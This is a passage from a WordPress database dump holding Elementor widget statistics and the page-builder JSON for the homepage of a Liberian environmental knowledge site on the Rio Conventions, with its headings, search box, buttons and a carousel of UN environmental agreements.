bg_color\";i:1;}s:29:\"section_search_category_style\";a:1:{s:21:\"search_category_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:3:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:4:{s:13:\"content_width\";i:1;s:6:\"height\";i:1;s:13:\"custom_height\";i:1;s:15:\"stretch_section\";i:4;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:10;}}s:5:\"style\";a:3:{s:18:\"section_background\";a:9:{s:21:\"background_background\";i:5;s:19:\"background_position\";i:3;s:21:\"background_attachment\";i:3;s:17:\"background_repeat\";i:1;s:15:\"background_size\";i:3;s:28:\"background_slideshow_gallery\";i:1;s:45:\"background_slideshow_ken_burns_zoom_direction\";i:1;s:16:\"background_image\";i:2;s:16:\"background_color\";i:2;}s:26:\"section_background_overlay\";a:3:{s:29:\"background_overlay_background\";i:1;s:24:\"background_overlay_color\";i:1;s:26:\"background_overlay_opacity\";i:1;}s:21:\"section_shape_divider\";a:3:{s:26:\"shape_divider_bottom_width\";i:1;s:27:\"shape_divider_bottom_height\";i:1;s:25:\"shape_divider_bottom_flip\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:6;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_divider\";a:3:{s:5:\"style\";i:1;s:5:\"width\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:6:\"weight\";i:1;}}}}s:20:\"jet-blog-smart-tiles\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:5:{s:10:\"min_height\";i:1;s:10:\"show_terms\";i:1;s:14:\"show_terms_num\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"show_date\";i:1;}s:13:\"section_query\";a:3:{s:9:\"post_type\";i:1;s:15:\"custom_query_by\";i:1;s:8:\"post_ids\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_box_style\";a:1:{s:9:\"boxes_gap\";i:1;}s:21:\"section_content_style\";a:6:{s:17:\"boxes_title_color\";i:1;s:23:\"boxes_title_color_hover\";i:1;s:33:\"boxes_title_typography_typography\";i:1;s:32:\"boxes_title_typography_font_size\";i:1;s:34:\"boxes_title_typography_font_weight\";i:1;s:21:\"boxes_title_alignment\";i:1;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:6;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:4;s:4:\"link\";i:4;s:5:\"align\";i:4;s:13:\"selected_icon\";i:3;s:10:\"icon_align\";i:3;s:11:\"icon_indent\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:25:\"typography_text_transform\";i:4;s:17:\"button_text_color\";i:4;s:16:\"background_color\";i:4;s:11:\"hover_color\";i:4;s:29:\"button_background_hover_color\";i:4;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}s:12:\"jet-carousel\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:14:\"section_slides\";a:1:{s:10:\"items_list\";i:1;}s:16:\"section_settings\";a:7:{s:11:\"item_layout\";i:1;s:16:\"animation_effect\";i:1;s:8:\"img_size\";i:1;s:14:\"title_html_tag\";i:1;s:17:\"equal_height_cols\";i:1;s:16:\"slides_to_scroll\";i:1;s:14:\"slides_to_show\";i:1;}s:26:\"section_additional_options\";a:3:{s:14:\"pause_on_hover\";i:1;s:14:\"autoplay_speed\";i:1;s:8:\"centered\";i:1;}}s:5:\"style\";a:3:{s:25:\"section_banner_item_style\";a:3:{s:21:\"background_background\";i:1;s:14:\"normal_opacity\";i:1;s:13:\"hover_opacity\";i:1;}s:24:\"section_item_title_style\";a:5:{s:17:\"items_title_color\";i:1;s:33:\"items_title_typography_typography\";i:1;s:32:\"items_title_typography_font_size\";i:1;s:34:\"items_title_typography_font_weight\";i:1;s:37:\"items_title_typography_letter_spacing\";i:1;}s:23:\"section_item_text_style\";a:5:{s:16:\"items_text_color\";i:1;s:32:\"items_text_typography_typography\";i:1;s:31:\"items_text_typography_font_size\";i:1;s:33:\"items_text_typography_font_weight\";i:1;s:33:\"items_text_typography_line_height\";i:1;}}}}s:18:\"oew-call-to-action\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:22:\"section_call_to_action\";a:2:{s:5:\"title\";i:1;s:11:\"description\";i:1;}s:14:\"section_button\";a:5:{s:8:\"btn_text\";i:1;s:8:\"btn_link\";i:1;s:4:\"icon\";i:1;s:10:\"icon_align\";i:1;s:11:\"icon_indent\";i:1;}}s:5:\"style\";a:3:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}s:25:\"section_description_style\";a:1:{s:17:\"description_color\";i:1;}s:20:\"section_button_style\";a:2:{s:23:\"button_background_color\";i:1;s:29:\"button_background_hover_color\";i:1;}}}}}'),(16954,9,'_edit_last','1'),(16955,9,'ocean_second_sidebar','0'),(16956,9,'ocean_center_header_left_menu','0'),(16957,9,'ocean_custom_header_template','0'),(16958,9,'ocean_menu_typo_font_family','0'),(16959,9,'ocean_disable_heading','default'),(16960,9,'ocean_custom_footer_template','0'),(16961,9,'osh_disable_topbar_sticky','default'),(16962,9,'osh_disable_header_sticky','default'),(16963,9,'osh_sticky_header_style','default'),(16964,2538,'_wp_page_template','default'),(16965,2538,'_elementor_edit_mode','builder'),(16966,2538,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas 